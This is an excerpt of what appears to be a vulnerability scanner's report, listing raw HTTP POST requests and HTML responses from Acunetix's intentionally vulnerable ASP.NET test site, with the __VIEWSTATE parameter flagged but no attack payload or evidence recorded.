Request Body - size: 1,099 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8407&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgCAtB5C8NoIZGRklNxOUE4%2FQdmVDV5QVpTPe6KaWDU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLOgJL3CAL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gUdhbFjnDy2ODJSJNE1rTpCz8%2Fk5w%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:16:04 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgCAtB5C8NoIZGRklNxOUE4/QdmVDV5QVpTPe6KaWDU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLOgJL3CAL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gUdhbFjnDy2ODJSJNE1rTpCz8/k5w==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:White" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1097 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,097 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8395&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgCAvyHU5toIZGRkwVHKcPQwibhyURf5fPxRoxqoh1Q%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK9%2Bq6vBwL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gWjGDg3fmzfaRvmE4bpDJiRMHOFHQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:46:25 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgCAvyHU5toIZGRkwVHKcPQwibhyURf5fPxRoxqoh1Q=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK9+q6vBwL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gWjGDg3fmzfaRvmE4bpDJiRMHOFHQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:White" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1097 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
